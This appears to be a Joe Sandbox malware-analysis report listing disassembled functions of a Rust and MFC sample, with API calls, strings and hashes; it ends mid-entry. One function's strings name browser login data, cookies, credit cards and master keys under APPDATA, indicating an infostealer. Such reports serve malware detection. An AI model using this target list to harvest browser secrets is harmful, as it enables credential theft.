                                                                                                                                              • String ID: Invalid$[internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs$assertion failed: curr.is_join_interested()$assertion failed: curr.is_join_waker_set()$assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0$assertion failed: snapshot.is_complete()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\harness.rs$attempt to divide by zero$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$n failed: prev.ref_count() >= 2
                                                                                                                                              • API String ID: 0-2035208961
                                                                                                                                              • Opcode ID: ccc0532e2d474efb6eb899a27a28ec1aa5855810d5f0c1f566743963fd548357
                                                                                                                                              • Instruction ID: b842016d36dff0b52c9c6066cfe70e8bffce0c0eaff61ffa640fd49918ae21ab
                                                                                                                                              • Opcode Fuzzy Hash: ccc0532e2d474efb6eb899a27a28ec1aa5855810d5f0c1f566743963fd548357
                                                                                                                                              • Instruction Fuzzy Hash: 1CD124706002518BDB24DF2CC95075ABBE2FFC5325F68856DE85A9B390EB71EC42CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0259A370 Relevance: 16.8, APIs: 10, Strings: 1, Instructions: 347memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259A574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259A58F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 3298025750-874791708
                                                                                                                                              • Opcode ID: 048b79132d7841d444e4610d40c491225c5975a6c75bfd698fb6a53a420acd23
                                                                                                                                              • Instruction ID: dd95fdc362daacb7e9d45d855ab1c3f83a0eecbc1423566db610e315958f924a
                                                                                                                                              • Opcode Fuzzy Hash: 048b79132d7841d444e4610d40c491225c5975a6c75bfd698fb6a53a420acd23
                                                                                                                                              • Instruction Fuzzy Hash: CBD19071A083418FDB25DF24D844B6FBBE2BFC8314F14482DE59997250EB35984ACF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041D66E Relevance: 16.8, APIs: 11, Instructions: 299COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0043A9D4,00000001,00000000,00000000,0043B208,00000038,00417C80,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041D695
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041D6A7
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00417F33,?,00000000,00000000,0043B208,00000038,00417C80,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041D72E
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00417F33,?,?,00000000), ref: 0041D7AF
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041D7C9
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0041D804
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: 4e68df62db2da08941074baaceedf4420aa6fcb3e7720cbc62ad2245d21ccbe8
                                                                                                                                              • Instruction ID: f05e7c59ad7515b7832d4e1e93c16c6c87d040a29f1d2ebd5c0f6427fa4a6e31
                                                                                                                                              • Opcode Fuzzy Hash: 4e68df62db2da08941074baaceedf4420aa6fcb3e7720cbc62ad2245d21ccbe8
                                                                                                                                              • Instruction Fuzzy Hash: C0B139B2D00219EFCF21AFA4DC859EE7B75FF08354F14412AF925A2260D7398DA1DB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CC1E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 165memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CBCE0: AcquireSRWLockExclusive.KERNEL32(00000008), ref: 025CBD39
                                                                                                                                                • Part of subcall function 025CBCE0: HeapFree.KERNEL32(00000000,00000000), ref: 025CBDE9
                                                                                                                                                • Part of subcall function 025CBCE0: HeapFree.KERNEL32(00000000,?), ref: 025CBDFA
                                                                                                                                                • Part of subcall function 025CBCE0: ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CBE0C
                                                                                                                                                • Part of subcall function 025BFE20: TlsGetValue.KERNEL32(00000000,00000000,025CC23F), ref: 025BFE2C
                                                                                                                                                • Part of subcall function 025BFE20: TlsGetValue.KERNEL32(00000000), ref: 025BFE4A
                                                                                                                                                • Part of subcall function 025BFE20: TlsSetValue.KERNEL32(00000000,00000000), ref: 025BFE8A
                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 025CC276
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CC328
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 025CC339
                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CC352
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000003), ref: 025CC41D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CC42E
                                                                                                                                              Strings
                                                                                                                                              • stdoutstderrlibrary\std\src\io\mod.rs, xrefs: 025CC211
                                                                                                                                              • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 025CC25B
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025CC37B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ExclusiveLock$Value$AcquireRelease
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs$stdoutstderrlibrary\std\src\io\mod.rs
                                                                                                                                              • API String ID: 3691851813-1631872077
                                                                                                                                              • Opcode ID: bf985dc5be0ccb763cb945a60c49798bfb5b0934dfacd4d4d8d910dc6f9a170e
                                                                                                                                              • Instruction ID: 3ce5c6896de402d979fa9b3c03495f956da2d60eb709fffacea1d32c122e6259
                                                                                                                                              • Opcode Fuzzy Hash: bf985dc5be0ccb763cb945a60c49798bfb5b0934dfacd4d4d8d910dc6f9a170e
                                                                                                                                              • Instruction Fuzzy Hash: 94618CB1D00208CFDF24CFD4E988BAEBBB5FB08705F14441AE905AB691E7759849CF58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422FFC Relevance: 15.1, APIs: 10, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00423039
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423041
                                                                                                                                                • Part of subcall function 004247EA: UnhookWindowsHookEx.USER32(?), ref: 0042480F
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423053
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00423080
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0042308E
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0042309D
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0042312C
                                                                                                                                              • GetActiveWindow.USER32 ref: 00423137
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423145
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423161
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeHookLoadLockUnhookWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3362358738-0
                                                                                                                                              • Opcode ID: 23e7f65befa7440df8e79eeea8a432c85f5a5959caccd24c17b927ce82f2994f
                                                                                                                                              • Instruction ID: 44036482665cc7e11abf287e92ecc354a93a460278f6ee91648675104effe8f1
                                                                                                                                              • Opcode Fuzzy Hash: 23e7f65befa7440df8e79eeea8a432c85f5a5959caccd24c17b927ce82f2994f
                                                                                                                                              • Instruction Fuzzy Hash: F241A531700625DBCB21AFA5E94977FBBB4EF44716F90003FE501A22A1C7BC5E45CA69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042565D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 0042567A
                                                                                                                                              • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004256D8
                                                                                                                                                • Part of subcall function 00424C8B: GetWindowRect.USER32(?,00424DAD), ref: 00424CB0
                                                                                                                                                • Part of subcall function 00424C8B: GetWindow.USER32(?,00000004), ref: 00424CCD
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00425708
                                                                                                                                              • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00425710
                                                                                                                                              • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00425717
                                                                                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 0042571E
                                                                                                                                                • Part of subcall function 00423DB0: GetWindowRect.USER32(?,?), ref: 00423DBC
                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00425772
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
                                                                                                                                              • String ID: AfxOldWndProc423
                                                                                                                                              • API String ID: 3892049428-1060338832
                                                                                                                                              • Opcode ID: 10d2a5aec3b997577270dab6d298fc0b9cd5d1bcd177ddbbb5c5fac6d3cc76f4
                                                                                                                                              • Instruction ID: c58938d15ef85ceb471def29655ae59a85cb9400ae0611950666c80f8e2187a5
                                                                                                                                              • Opcode Fuzzy Hash: 10d2a5aec3b997577270dab6d298fc0b9cd5d1bcd177ddbbb5c5fac6d3cc76f4
                                                                                                                                              • Instruction Fuzzy Hash: E1318332A0012AEBCB11AFA5ED49DBF7B78FF89310F80012AF511A2150D7789911DB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00427B2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00427B53
                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 00427B5B
                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 00427B68
                                                                                                                                              • GetDC.USER32(00000000), ref: 00427B77
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00427B8B
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00427B97
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00427BA2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 46613423-3470857405
                                                                                                                                              • Opcode ID: 3618959336a5d2387a8584dc03d5aa96b6a4e2ba3ebebbc47e731d6b0f56e9d2
                                                                                                                                              • Instruction ID: 7761e190ee946e44623cd7a4fdd5fc82f47dd554012855bd1365dda4637adce3
                                                                                                                                              • Opcode Fuzzy Hash: 3618959336a5d2387a8584dc03d5aa96b6a4e2ba3ebebbc47e731d6b0f56e9d2
                                                                                                                                              • Instruction Fuzzy Hash: F5115471B00218EBDB10EBA0ED45F9E3B74EF14745F904035F605AA190D7B4AD46CB68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00423CB8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00424635,?,00040000), ref: 00423CC1
                                                                                                                                              • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423CCA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423CDE
                                                                                                                                              • #17.COMCTL32 ref: 00423CF9
                                                                                                                                              • #17.COMCTL32 ref: 00423D15
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00423D22
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                              • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                                                              • API String ID: 1437655972-4218389149
                                                                                                                                              • Opcode ID: bf34ed095592dcafb683c73bd76fb3753a0aa3a0d8d12ebda3a1314fc7045279
                                                                                                                                              • Instruction ID: d616edb962f15808b37bc422b71edd0b26b380362643589d42d25bf3a016dfe7
                                                                                                                                              • Opcode Fuzzy Hash: bf34ed095592dcafb683c73bd76fb3753a0aa3a0d8d12ebda3a1314fc7045279
                                                                                                                                              • Instruction Fuzzy Hash: 72F0F936B143229797219FE0BC4891BB6B8AF95722B814436F801E3211CF2CCD0B467D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257F106 Relevance: 13.9, APIs: 7, Strings: 2, Instructions: 397memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257F462
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257F481
                                                                                                                                              Strings
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257F6F1
                                                                                                                                              • , xrefs: 0257F608
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: $a Display implementation returned an error unexpectedly
                                                                                                                                              • API String ID: 3298025750-229198390
                                                                                                                                              • Opcode ID: 1327cc83d4e738f8f7a85ccf93ec401d5d934260b18960a868c905cd48b0847c
                                                                                                                                              • Instruction ID: afe080cc0331431099df4263edd47217921ea2f068dddd5eee3441c444d60305
                                                                                                                                              • Opcode Fuzzy Hash: 1327cc83d4e738f8f7a85ccf93ec401d5d934260b18960a868c905cd48b0847c
                                                                                                                                              • Instruction Fuzzy Hash: 96F19F71A08341AFDB64DF24D884B6FBBE2BFC4304F14482DF98997691EB319905CB5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257C31D Relevance: 13.8, APIs: 4, Strings: 5, Instructions: 294memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C4B0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C64B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C6DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C71B
                                                                                                                                              Strings
                                                                                                                                              • nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime, xrefs: 0257C3A0
                                                                                                                                              • APPDATA, xrefs: 0257C521
                                                                                                                                              • Invalid, xrefs: 0257C6C0
                                                                                                                                              • path*fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 0257C3CD
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 0257C744
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$Value$CryptRandom
                                                                                                                                              • String ID: APPDATA$Invalid$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime$path*fatal runtime error: I/O error: operation failed to complete synchronously
                                                                                                                                              • API String ID: 740635937-1962946080
                                                                                                                                              • Opcode ID: 737438f561b1a1119f6bac2308a44188733521f42586dea12bc7b942a5c6ba83
                                                                                                                                              • Instruction ID: 77a94ffe1a39eb722e1642e7414f4767b0124cbbd1bf8293c8fa52d0bbdb8906
                                                                                                                                              • Opcode Fuzzy Hash: 737438f561b1a1119f6bac2308a44188733521f42586dea12bc7b942a5c6ba83
                                                                                                                                              • Instruction Fuzzy Hash: 4AC16B71A083419FD724DF29D880B5BBBE2BFC8314F04892EE99997350EB71D945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00420A21 Relevance: 13.8, APIs: 9, Instructions: 293COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000000,0043A9D4,00000001,0043A9D4,00000001,0043B4A8,00000040,00420655,?,00000001,?,00000000,?,00000000,?), ref: 00420A50
                                                                                                                                              • GetLastError.KERNEL32(?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007,?,?,00000000,00000006,00000006), ref: 00420A62
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,0041509C,0043B4A8,00000040,00420655,?,00000001,?,00000000,?,00000000,?,?,0041FB6C,00000000,00000000), ref: 00420B0C
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420B9A
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000064,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C13
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,004151C7,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C30
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,004151C7,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420CA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1773772771-0
                                                                                                                                              • Opcode ID: edf37570b9a6133125698eafa9279b85b7ab7cef9f5632037470c00f62594779
